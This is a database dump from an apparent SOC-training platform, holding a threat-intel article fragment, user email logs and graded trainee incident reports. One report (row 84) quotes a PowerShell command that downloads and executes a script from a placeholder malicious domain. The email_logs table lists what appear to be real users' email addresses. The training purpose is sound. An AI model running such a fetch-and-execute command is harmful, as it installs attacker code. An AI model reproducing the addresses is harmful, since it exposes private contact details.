Critical data is either exfiltrated or encrypted for ransom demands.\n\n### Example Log Entry\n\n```plaintext\nSRC IP: [Malicious IP]\nDST IP: [Victim IP]\nPayload: [Malware/Ransomware Signature]\nAction: Connection Established\n```\n\n## 🛡️ Detection & Response\n\n### Log Sources\n\n- **Firewall Logs**: To identify unauthorized connection attempts.\n- **IDS/IPS Logs**: To detect signatures of known threats and anomalous network patterns.\n- **System Logs**: To monitor unauthorized access and system changes.\n\n### Incident Severity\n\n- **P1 (Critical)**: Active ransomware encryption in progress.\n- **P2 (High)**: Detected malware communication to C2 servers.\n- **P3 (Moderate)**: Phishing attempts detected.\n\n### Technical Hunt Query\n\n```sql\nSELECT * FROM network_logs\nWHERE src_ip IN (SELECT malicious_ip FROM threat_intel)\nAND event_type = \'connection_attempt\'\nAND action = \'blocked\';\n```\n\n## 🎓 Academy Focus\n\n### Career Impact\n\nUnderstanding and mitigating such large-scale cyber threats are essential for cybersecurity professionals. Expertise in network forensics, malware analysis, and incident response are particularly relevant.\n\n### Technical Glossary\n\n- **IP Address**: A unique string of numbers separated by periods that identifies each computer using the Internet Protocol to communicate over a network.\n- **Phishing**: The fraudulent practice of sending emails purporting to be from reputable companies to induce individuals to reveal personal information.\n- **Ransomware**: A type of malicious software designed to block access to a computer system until a sum of money is paid.\n\n## 🚀 Lab Integration\n\n### Related Training at InfoSecLabs\n\n1. **Operation Radiant Horizon**: Simulates the detection and mitigation of a multi-national phishing scam.\n2. **Operation Dragon Breath**: Focuses on identifying and responding to malware threats.\n3. **Operation Phantom Ballot**: Engages trainees in a scenario involving election security and information integrity.\n\n## MITRE ATT&CK® Mapping\n\nDue to the absence of specific techniques in the extracted data, a precise mapping is not feasible. However, typical mappings could involve:\n\n- **T1566 (Phishing)**: For the initial compromise via deceptive emails.\n- **T1486 (Data Encrypted for Impact)**: Relating to ransomware activities.\n\nIn conclusion, the successful takedown by INTERPOL represents a significant blow to cybercriminal operations worldwide. For cybersecurity professionals at InfoSecLabs and beyond, this operation serves as a critical case study in the effectiveness of international cooperation and the ongoing need for advanced cybersecurity measures and training.\n', 'INTERPOL took down 45,000 malicious IP addresses and servers related to phishing, malware, and ransomware activities across 72 countries.', 'http://infoseclabs.io/uploads/1773586944413-601928429.jpg', NULL, 1, 'published', '2026-03-14 19:00:00', '2026-03-15 18:02:38', 'Threat Intelligence', 'INTERPOL\'s Global Crackdown on 45K Cybercrime IPs & 94 Arrests', 'Discover how INTERPOL\'s landmark cybercrime operation dismantled 45,000 IPs & led to 94 arrests, setting a new precedent in cybersecurity.', 'INTERPOL cybercrime operation');

-- --------------------------------------------------------

--
-- Table structure for table `email_logs`
--

CREATE TABLE `email_logs` (
  `id` int(11) NOT NULL,
  `recipient_email` varchar(255) NOT NULL,
  `subject` varchar(255) DEFAULT NULL,
  `status` varchar(50) DEFAULT NULL,
  `error_message` text DEFAULT NULL,
  `user_id` int(11) DEFAULT NULL,
  `sent_at` timestamp NOT NULL DEFAULT current_timestamp()
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;

--
-- Dumping data for table `email_logs`
--

INSERT INTO `email_logs` (`id`, `recipient_email`, `subject`, `status`, `error_message`, `user_id`, `sent_at`) VALUES
(1, 'halilbaris@gmail.com', 'Test Render: weekly_report_body', 'sent', NULL, NULL, '2026-03-15 16:30:47'),
(2, '2301301141.nitin@geetauniversity.edu.in', 'New Mission: Malware Detected - Suspicious Process Execution', 'sent', NULL, NULL, '2026-03-15 17:12:52'),
(3, 'akarunkumar348@gmail.com', 'Subscription Upgraded', 'sent', NULL, NULL, '2026-03-15 17:20:16'),
(4, 'akarunkumar348@gmail.com', 'New Mission: Suspicious PowerShell Script Execution', 'sent', NULL, NULL, '2026-03-15 17:21:45'),
(5, 'villarca@outlook.com', 'Verify your email address', 'sent', NULL, NULL, '2026-03-15 17:28:08'),
(6, 'karthikandatom@gmail.com', 'Verify your email address', 'sent', NULL, NULL, '2026-03-15 17:51:16'),
(7, '2301301141.nitin@geetauniversity.edu.in', 'New Mission: Phishing Attempt Detected - Malicious Email Link', 'sent', NULL, NULL, '2026-03-15 18:05:12'),
(8, '2301301141.nitin@geetauniversity.edu.in', 'New Mission: Suspicious PowerShell Command Execution Detected', 'sent', NULL, NULL, '2026-03-15 18:14:41'),
(9, 'shantaciak@gmail.com', 'Verify your email address', 'sent', NULL, NULL, '2026-03-15 18:38:43'),
(10, 'emelyanovakt@gmail.com', 'New Mission: Spear Phishing Email Detected', 'sent', NULL, NULL, '2026-03-15 19:11:11'),
(11, 'skegeo@yahoo.com', '🚀 Maximize Your Security Training - InfoSecLabs Pro', 'sent', NULL, NULL, '2026-03-15 21:15:07'),
(12, 'skegeo@yahoo.com', '🚀 Maximize Your Security Training - InfoSecLabs Pro', 'sent', NULL, NULL, '2026-03-15 21:15:40'),
(13, 'skegeo@yahoo.com', '🚀 Maximize Your Security Training - InfoSecLabs Pro', 'sent', NULL, NULL, '2026-03-15 21:16:50'),
(14, 'skegeo@yahoo.com', '🚀 Maximize Your Security Training - InfoSecLabs Pro', 'sent', NULL, NULL, '2026-03-15 21:17:06'),
(15, 'hmuhina@wgu.edu', 'New Mission: Spear Phishing Email Detected', 'sent', NULL, NULL, '2026-03-16 01:46:28');

-- --------------------------------------------------------

--
-- Table structure for table `feedbacks`
--

CREATE TABLE `feedbacks` (
  `id` int(11) NOT NULL,
  `user_id` int(11) DEFAULT NULL,
  `grade` int(11) DEFAULT NULL,
  `feedback` text DEFAULT NULL,
  `created_at` datetime DEFAULT current_timestamp(),
  `updated_at` datetime DEFAULT current_timestamp() ON UPDATE current_timestamp()
) ENGINE=MyISAM DEFAULT CHARSET=latin1 COLLATE=latin1_swedish_ci;

-- --------------------------------------------------------

--
-- Table structure for table `investigations`
--

CREATE TABLE `investigations` (
  `id` int(11) NOT NULL,
  `user_id` int(11) NOT NULL,
  `alert_id` int(11) NOT NULL,
  `status` varchar(50) DEFAULT 'investigating',
  `grade` int(11) DEFAULT NULL,
  `feedback` text DEFAULT NULL,
  `executive_summary` text DEFAULT NULL,
  `ai_summary` longtext CHARACTER SET utf8mb4 COLLATE utf8mb4_bin DEFAULT NULL,
  `ai_evaluation_scheduled_at` datetime DEFAULT NULL,
  `created_at` timestamp NULL DEFAULT current_timestamp(),
  `updated_at` timestamp NULL DEFAULT current_timestamp() ON UPDATE current_timestamp(),
  `is_reported` tinyint(1) DEFAULT 0,
  `report_reason` text DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_general_ci;

--
-- Dumping data for table `investigations`
--

INSERT INTO `investigations` (`id`, `user_id`, `alert_id`, `status`, `grade`, `feedback`, `executive_summary`, `ai_summary`, `ai_evaluation_scheduled_at`, `created_at`, `updated_at`, `is_reported`, `report_reason`) VALUES
(44, 41, 240, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"artifact_1\",\"artifact_2\"],\"selectedActions\":[\"isolate_host\",\"reset_credentials\"],\"verdict\":\"true_positive\",\"conclusion\":\"\",\"submitted_at\":\"2025-12-27T10:33:40.336Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"The PowerShell command was identified as potentially malicious due to its encoded nature and execution with high integrity.\",\"missed_items\":[\"Analysis of the decoded command\",\"Summary and conclusion of findings\",\"Action plan or recommendation\"],\"strengths\":\"The analyst has successfully identified the event as suspicious, which is the main takeaway needed in incident response.\"}', NULL, '2025-12-27 10:31:24', '2026-01-02 02:40:31', 0, NULL),
(45, 41, 242, 'investigating', NULL, NULL, NULL, NULL, '2025-12-27 13:50:44', '2025-12-27 10:42:44', '2025-12-27 10:42:44', 0, NULL),
(46, 41, 241, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"artifact_1\",\"artifact_2\"],\"selectedActions\":[\"isolate_host\"],\"verdict\":\"true_positive\",\"conclusion\":\"\",\"submitted_at\":\"2025-12-27T10:44:02.144Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"The analyst should have noted the use of PowerShell with Invoke-Expression to download a script from a questionable URL, indicative of potentially malicious activity.\",\"missed_items\":[\"Detailed analysis or actions taken\",\"Key artifacts such as the URL and file hash\"],\"strengths\":\"Correctly identified the event as a true positive.\"}', NULL, '2025-12-27 10:42:49', '2026-01-02 02:40:31', 0, NULL),
(47, 44, 166, 'investigating', NULL, NULL, NULL, NULL, '2025-12-28 00:05:00', '2025-12-27 21:00:00', '2025-12-27 21:00:00', 0, NULL),
(51, 54, 255, 'investigating', NULL, NULL, '{\"verdict\":\"True Positive\",\"executive_summary\":{\"report\":\"## Executive Report\\n**Date:** 1/3/2026\\n**Verdict:** True Positive\\n\\n### Incident Overview\\nAlert triggered by suspicious activity classified as **Insider Threat**.\\n\\n### Key Findings & Artifacts\\n- IP: 192.168.32.201\\n\\n### Incident Response\\nActions taken to mitigate the threat:\\nReset Credentials, Block IP / Domain, Isolate Host\",\"conclusion\":\"This alert is classified as a True Positive based on the following findings:\\n\\n1. The identified artifacts (192.168.32.201) were analyzed and determined to be malicious.\\n\\n2. Impact Assessment: The threat was confirmed. Immediate containment measures were taken to prevent lateral movement.\\n\\n3. Recommended Actions: Continue monitoring the affected systems, review access logs, and consider password resets for affected accounts.\"},\"artifacts\":[{\"type\":\"IP\",\"value\":\"192.168.32.201\",\"link\":\"\",\"score\":\"\"}],\"analysis_answers\":{\"attack_category\":\"Insider Threat\",\"action_taken\":[\"Reset Credentials\",\"Block IP / Domain\",\"Isolate Host\"]},\"submitted_at\":\"2026-01-03T16:55:43.995Z\"}', '{\"verdict_correctness\":\"N/A\",\"key_findings\":\"Legacy Format\",\"missed_items\":[],\"strengths\":\"Completed\"}', NULL, '2025-12-29 21:35:43', '2026-01-31 21:00:01', 0, NULL),
(52, 54, 257, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"artifact_1\",\"artifact_2\"],\"selectedActions\":[\"isolate_host\",\"reset_credentials\",\"block_ip\",\"block_hash\"],\"verdict\":\"true_positive\",\"conclusion\":\"This alert is True Positive\\nDetection POWERSHELL-0012 correctly identified malicious activity, suspicious PowerShell execution and fileless malware pattern. Actions are warranted\",\"submitted_at\":\"2025-12-29T21:58:29.581Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Suspicious PowerShell execution with known malicious network communication.\",\"missed_items\":[\"Executive Summary\",\"Artifacts such as file hash and IP address\"],\"strengths\":\"Correctly identified the activity as malicious.\"}', NULL, '2025-12-29 21:46:51', '2026-01-02 02:40:31', 0, NULL),
(53, 54, 256, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"artifact_1\",\"artifact_2\"],\"selectedActions\":[\"close_alert\"],\"verdict\":\"true_positive\",\"conclusion\":\"Alert is True Positive, its a known phishing URL, SEG saw the link is on a blacklist and quarantined the mail. The inbound e-mail bever reached the user\'s inbox. \",\"submitted_at\":\"2025-12-29T22:36:14.618Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"The email contained a blacklisted URL linked to phishing, and the email was quarantined.\",\"missed_items\":[\"Actions Taken\",\"Analysis/Artifacts Found\",\"Headers\"],\"strengths\":\"Correctly identified the email as a phishing attempt and stated that it was quarantined.\"}', NULL, '2025-12-29 22:28:13', '2026-01-02 02:40:31', 0, NULL),
(59, 34, 268, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.100\",\"ip-10.0.0.15\",\"ip-203.0.113.45\",\"artifact_1\",\"artifact_3\"],\"selectedActions\":[\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"],\"verdict\":\"true_positive\",\"conclusion\":\"\",\"submitted_at\":\"2026-02-08T19:05:10.314Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). Missed critical artifacts: ip 203.0.113.45 (1/2). Missed response actions (3/4)\",\"missed_items\":[\"ip: 203.0.113.45\",\"escalate\"],\"strengths\":\"Needs improvement\"}', NULL, '2025-12-31 13:10:22', '2026-02-28 21:00:00', 0, NULL),
(60, 34, 269, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"artifact_1\",\"artifact_2\",\"artifact_3\",\"artifact_4\",\"artifact_5\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"],\"verdict\":\"true_positive\",\"conclusion\":\"this is truepositive alert, end point has to isolate, block domain , hash etc. .\",\"submitted_at\":\"2025-12-31T14:34:55.159Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"The execution of BlackEnergy malware, involvement of suspicious file and process, and the details such as file hash, IP addresses, and the user\'s action.\",\"missed_items\":[\"file_hash\",\"file_path\",\"internal_ip\",\"external_ip\",\"associated_action steps\"],\"strengths\":\"The analyst correctly identified the alert as a true positive.\"}', NULL, '2025-12-31 13:11:32', '2026-01-02 02:40:31', 0, NULL),
(65, 34, 270, 'investigating', NULL, NULL, NULL, NULL, NULL, '2025-12-31 14:34:55', '2025-12-31 14:34:55', 0, NULL),
(67, 34, 304, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"artifact_1\",\"artifact_2\",\"artifact_3\",\"artifact_4\"],\"selectedActions\":[\"block_hash\",\"block_ip\"],\"verdict\":\"true_positive\",\"conclusion\":\"It is truepositive alert. We need to block URL/Doamin and IP address and hash. \",\"submitted_at\":\"2026-01-02T04:31:15.901Z\"}', '{\"verdict\":\"True Positive\",\"recommended_actions\":[\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"critical_artifacts\":[{\"type\":\"email\",\"value\":\"finance.partner@maliciousdomain.com\",\"osint_verdict\":\"malicious\"},{\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"osint_verdict\":\"malicious\"},{\"type\":\"url\",\"value\":\"http://maliciousdomain.com/securelogin\",\"osint_verdict\":\"malicious\"},{\"type\":\"ip\",\"value\":\"203.0.113.45\",\"osint_verdict\":\"malicious\"}]}', NULL, '2026-01-02 04:28:59', '2026-01-31 21:00:01', 0, NULL),
(68, 34, 305, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-01-02 04:31:15', '2026-01-02 04:31:15', 0, NULL),
(71, 34, 318, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"artifact_1\",\"artifact_2\"],\"selectedActions\":[\"reset_credentials\",\"close_alert\"],\"verdict\":\"false_positive\",\"conclusion\":\"\",\"submitted_at\":\"2026-02-05T02:30:55.938Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-01-02 15:27:39', '2026-02-28 21:00:00', 0, NULL),
(81, 34, 274, 'investigating', NULL, NULL, NULL, NULL, '2026-01-03 00:42:46', '2026-01-02 21:34:46', '2026-01-02 21:34:46', 0, NULL),
(82, 54, 318, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"artifact_1\",\"artifact_2\"],\"selectedActions\":[\"reset_credentials\"],\"verdict\":\"false_positive\",\"conclusion\":\"Instigation confirmed benign activity on internal, known host \\\"internal-server\\\" (192.168.1.15). 15 failed login attempts to \\\"admin\\\" account on dst 192.168.1.100 were triggered by likely cause e.g., automated script misconfig, service account password expiry/rotation, or scheduled task with stale creds. No evidence of brute-force. Host verified clean via EDR scan/logs. Action taken (credential reset) was precautionary. No IOC\'s or anomalies post-review.\",\"submitted_at\":\"2026-01-03T17:06:09.611Z\"}', '{\"verdict\":\"False Positive\",\"recommended_actions\":[\"close_alert\"],\"critical_artifacts\":[{\"type\":\"ip\",\"value\":\"192.168.1.15\",\"osint_verdict\":\"internal\"}]}', NULL, '2026-01-03 16:56:39', '2026-01-31 21:00:01', 0, NULL),
(83, 54, 315, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"artifact_1\",\"artifact_2\",\"artifact_3\"],\"selectedActions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\"],\"verdict\":\"true_positive\",\"conclusion\":\"Host compromised: WORKSTATION-01 (10.0.02) affected user: Jane.doe, Malware Identified: malware.exe-has b194 linked to known enterprise-targeting campaign. Rapid threat intelligence VirusTotal scan confirmed malicious hash. Risk level high. Immediate response actions host Isolation: WORKSTATION-01 quarantined from network-prevented lateral movement and data exfiltration. Malware Blocking: Malware hash globally blacklisted across all enterprise endpoints, Forensic Capture: Memory and disk imaging performed to preserve evidence. \",\"submitted_at\":\"2026-01-03T17:19:44.573Z\"}', '{\"verdict\":\"True Positive\",\"recommended_actions\":[\"block_hash\",\"isolate_host\",\"collect_forensics\"],\"critical_artifacts\":[{\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"osint_verdict\":\"malicious\"}]}', NULL, '2026-01-03 17:07:54', '2026-01-31 21:00:01', 0, NULL),
(84, 54, 249, 'investigating', NULL, NULL, '{\"verdict\":\"True Positive\",\"executive_summary\":{\"report\":\"## Executive Report\\n**Date:** 1/3/2026\\n**Verdict:** True Positive\\n\\n### Incident Overview\\nAlert triggered by suspicious activity classified as **Web Attack**.\\n\\n### Key Findings & Artifacts\\n- URL: http://maliciousdomain.com/script.ps1\\n- Command: \\\"iex (New-Object Net.WebClient).DownloadString(\'http://maliciousdomain.com/script.ps1\')\\n- IP: 192.168.1.105\\n- Process: explorer.exe\\n\\n### Incident Response\\nActions taken to mitigate the threat:\\nIsolate Host, Block IP / Domain\",\"conclusion\":\"This alert is classified as a True Positive based on the following findings:\\n\\n1. The identified artifacts (http://maliciousdomain.com/script.ps1, \\\"iex (New-Object Net.WebClient).DownloadString(\'http://maliciousdomain.com/script.ps1\'), 192.168.1.105, explorer.exe) were analyzed and determined to be malicious.\\n\\n2. Impact Assessment: The threat was confirmed. Immediate containment measures were taken to prevent lateral movement.\\n\\n3. Recommended Actions: Continue monitoring the affected systems, review access logs, and consider password resets for affected accounts.\"},\"artifacts\":[{\"type\":\"URL\",\"value\":\"http://maliciousdomain.com/script.ps1\",\"link\":\"\",\"score\":\"\"},{\"type\":\"Command\",\"value\":\"\\\"iex (New-Object Net.WebClient).DownloadString(\'http://maliciousdomain.com/script.ps1\')\",\"link\":\"\",\"score\":\"\"},{\"type\":\"IP\",\"value\":\"192.168.1.105\",\"link\":\"\",\"score\":\"\"},{\"type\":\"Process\",\"value\":\"explorer.exe\",\"link\":\"\",\"score\":\"\"}],\"analysis_answers\":{\"attack_category\":\"Web Attack\",\"action_taken\":[\"Isolate Host\",\"Block IP / Domain\"]},\"submitted_at\":\"2026-01-03T17:35:55.420Z\"}', '{\"verdict_correctness\":\"N/A\",\"key_findings\":\"Legacy Format\",\"missed_items\":[],\"strengths\":\"Completed\"}', NULL, '2026-01-03 17:21:08', '2026-01-31 21:00:01', 0, NULL),
(86, 49, 428, 'investigating', NULL, NULL, NULL, NULL, '2026-01-05 01:39:51', '2026-01-04 22:30:51', '2026-01-04 22:30:51', 0, NULL),
(87, 1, 476, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-01-05 03:22:25', '2026-01-05 03:22:25', 0, NULL),
(88, 34, 496, 'investigating', NULL, NULL, NULL, NULL, '2026-01-06 03:35:33', '2026-01-06 00:29:33', '2026-01-06 00:29:33', 0, NULL),
(89, 34, 476, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"artifact_1\",\"artifact_2\",\"artifact_3\",\"artifact_4\",\"artifact_5\",\"artifact_6\"],\"selectedActions\":[\"block_ip\",\"block_hash\"],\"verdict\":\"true_positive\",\"conclusion\":\"This alert is true positive. \",\"submitted_at\":\"2026-01-06T00:54:10.521Z\"}', '{\"verdict\":\"True Positive\",\"recommended_actions\":[\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"critical_artifacts\":[{\"type\":\"ip\",\"value\":\"203.0.113.45\",\"osint_verdict\":\"malicious\"},{\"type\":\"email\",\"value\":\"attacker@maliciousdomain.com\",\"osint_verdict\":\"malicious\"},{\"type\":\"hash\",\"value\":\"a4b9c78cb6f1a2b3d4e5f6a7b8c9d0e1\",\"osint_verdict\":\"malicious\"},{\"type\":\"filename\",\"value\":\"important_document.rtf\",\"osint_verdict\":\"malicious\"}]}', NULL, '2026-01-06 00:53:10', '2026-01-31 21:00:01', 0, NULL),
(90, 34, 477, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-01-06 00:54:10', '2026-01-06 00:54:10', 0, NULL),
(91, 1, 525, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-01-06 01:49:25', '2026-01-06 01:49:25', 0, NULL),
(92, 65, 244, 'investigating', NULL, NULL, NULL, NULL, '2026-01-06 10:10:49', '2026-01-06 07:00:49', '2026-01-06 07:00:49', 0, NULL),
(93, 1, 530, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-01-06 19:45:51', '2026-01-06 19:45:51', 0, NULL),
(94, 68, 530, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"artifact_1\",\"artifact_2\",\"artifact_3\",\"artifact_4\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"\",\"submitted_at\":\"2026-01-07T16:11:48.286Z\"}', '{\"verdict\":\"True Positive\",\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"critical_artifacts\":[{\"type\":\"ip\",\"value\":\"203.0.113.5\",\"osint_verdict\":\"malicious\"},{\"type\":\"hash\",\"value\":\"3a2f4e6d2b2a4f5c6f9e8b7e4c1d2f3e\",\"osint_verdict\":\"malicious\"},{\"type\":\"filename\",\"value\":\"ASUSUpdate.exe\",\"osint_verdict\":\"suspicious\"}]}', NULL, '2026-01-07 16:08:30', '2026-01-31 21:00:01', 0, NULL),
(95, 68, 531, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"artifact_1\",\"artifact_2\",\"artifact_3\",\"artifact_4\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"This report summarizes the Malicious payload, identifying key strengths in our response and critical areas needing improvement to address evolving threats like.\\nSuccessfully contained simulated ransomware, but identified gaps in endpoint detection coverage on 15% of legacy devices.\\nWhile no data was lost, potential downtime could have impacted critical operations.\\nRecommendations for improvement:  1. Upgrade EDR on legacy systems; 2. Develop updated playbooks for data exfiltration; 3. Conduct quarterly phishing simulations. \",\"submitted_at\":\"2026-01-07T16:40:25.941Z\"}', '{\"verdict\":\"True Positive\",\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"],\"critical_artifacts\":[{\"type\":\"ip\",\"value\":\"203.0.113.15\",\"osint_verdict\":\"malicious\"},{\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"osint_verdict\":\"malicious\"}]}', NULL, '2026-01-07 16:11:48', '2026-01-31 21:00:01', 0, NULL),
(96, 68, 532, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"artifact_1\",\"artifact_2\",\"artifact_3\",\"artifact_4\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"This report summarizes the [Event Name], identifying key strengths in our response and critical areas needing improvement to address evolving threats like [Threat Type]\\\".\\nKey Findings: Backdoor was detected.\\nBusiness Impact: While no data was lost, potential downtime could have impacted critical operations.\\nRecommendations (POA&M): 1. Upgrade EDR on legacy systems; 2. Develop updated playbooks for data exfiltration; 3. Conduct quarterly phishing simulations. \",\"submitted_at\":\"2026-01-07T16:43:10.336Z\"}', '{\"verdict\":\"True Positive\",\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"],\"critical_artifacts\":[{\"type\":\"ip\",\"value\":\"203.0.113.45\",\"osint_verdict\":\"malicious\"},{\"type\":\"username\",\"value\":\"compromised_user\",\"osint_verdict\":\"suspicious\"},{\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"osint_verdict\":\"malicious\"}]}', NULL, '2026-01-07 16:40:25', '2026-01-31 21:00:01', 0, NULL),
(97, 68, 533, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-01-07 16:43:10', '2026-01-07 16:43:10', 0, NULL),
(98, 34, 530, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-01-11 01:35:26', '2026-01-11 01:35:26', 0, NULL),
(99, 34, 546, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-01-11 01:38:00', '2026-01-11 01:38:00', 0, NULL),
(100, 34, 345, 'investigating', NULL, NULL, NULL, NULL, '2026-01-11 04:54:19', '2026-01-11 01:45:19', '2026-01-11 01:45:19', 0, NULL),
(147, 78, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-01-14 03:22:08', '2026-01-14 03:22:08', 0, NULL),
(148, 74, 642, 'investigating', NULL, NULL, NULL, NULL, '2026-01-14 09:40:24', '2026-01-14 06:35:24', '2026-01-14 06:35:24', 0, NULL),
(149, 74, 830, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-01-14 06:36:01', '2026-01-14 06:36:01', 0, NULL),
(150, 74, 236, 'investigating', NULL, NULL, NULL, NULL, '2026-01-14 09:44:57', '2026-01-14 06:38:57', '2026-01-14 06:38:57', 0, NULL),
(151, 74, 601, 'investigating', NULL, NULL, NULL, NULL, '2026-01-14 09:48:23', '2026-01-14 06:40:23', '2026-01-14 06:40:23', 0, NULL),
(152, 85, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-01-16 13:33:40', '2026-01-16 13:33:40', 0, NULL),
(153, 85, 952, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"artifact_1\",\"artifact_2\"],\"selectedActions\":[\"block_ip\"],\"verdict\":\"true_positive\",\"conclusion\":\"Dest ip: 192.168.1.50\\nSource ip: 203.0.113.55\\nhostname: server01\\ndomain : maliciousc2.com\\n\\nThe ip and domain belong to C2C server and they are blocked. \\n\\nIt is important to analyse deeper to verify, if the connection is successful.\\n\",\"submitted_at\":\"2026-01-16T13:40:01.913Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). Missed critical artifacts (0/2). Missed response actions (1/3)\",\"missed_items\":[],\"strengths\":\"Needs improvement\"}', NULL, '2026-01-16 13:35:06', '2026-01-31 21:00:01', 0, NULL),
(154, 85, 727, 'investigating', NULL, NULL, NULL, NULL, '2026-01-16 16:45:24', '2026-01-16 13:40:24', '2026-01-16 13:40:24', 0, NULL),
(155, 54, 268, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"artifact_1\",\"artifact_2\",\"artifact_3\"],\"selectedActions\":[\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"isolate_host\"],\"verdict\":\"true_positive\",\"conclusion\":\"Email abc123@example.com was reported Suspicious with Unusual email activity detected.\\nIP 203.0.113.45 was reported as Malicious the IP is associated with known phishing campaigns.\\nHash 3a7bd3e2360f1edb0f3b4e5c7b6e9d5a was reported Malicious there was Malware detected in attachment.\\nContainment protocol consist of isolating host, block IP/Domain, block file hash, reset credentials, and collect forensics.\\nVerdict is True positive\",\"submitted_at\":\"2026-01-17T03:11:31.821Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). Missed critical artifacts (0/2). Missed response actions (3/4)\",\"missed_items\":[],\"strengths\":\"Needs improvement\"}', NULL, '2026-01-17 03:00:58', '2026-01-31 21:00:01', 0, NULL),
(156, 54, 269, 'investigating', NULL, NULL, '{\"playbook_version\":2,\"checkedArtifacts\":[\"artifact_1\",\"artifact_2\",\"artifact_3\",\"artifact_4\",\"artifact_5\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"],\"verdict\":\"true_positive\",\"conclusion\":\"October 5, 2023, EDR system alerted to a confirmed BlackEnergy malware execution on the host CORP-ENDPOINT-23 (user:jdoe). The infection originated from malicious phishing attachment (invoice.doc).\\nKey findings:\\nSource: Malicious file invoice.doc delivered via email\\nInfected Host: Internal IP 192.168.1.45\\nCommand & Control: Communication with a known malicious external IP (203.0.113.50) associated with BlackEnergy campaigns.\\nIOC Match: File hash and malware signature confirmed against threat intelligence database.\\nActions taken were to isolate the host, block IP/Domain, block file hash, reset credentials, and to collect forensics. The incident was classified as a True Positive with high severity level.\\n\\n\",\"submitted_at\":\"2026-01-17T03:30:03.780Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). Missed critical artifacts (0/2). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Needs improvement\"}', NULL, '2026-01-17 03:11:31', '2026-01-31 21:00:01', 0, NULL),
(157, 54, 270, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-01-17 03:30:03', '2026-01-17 03:30:03', 0, NULL),
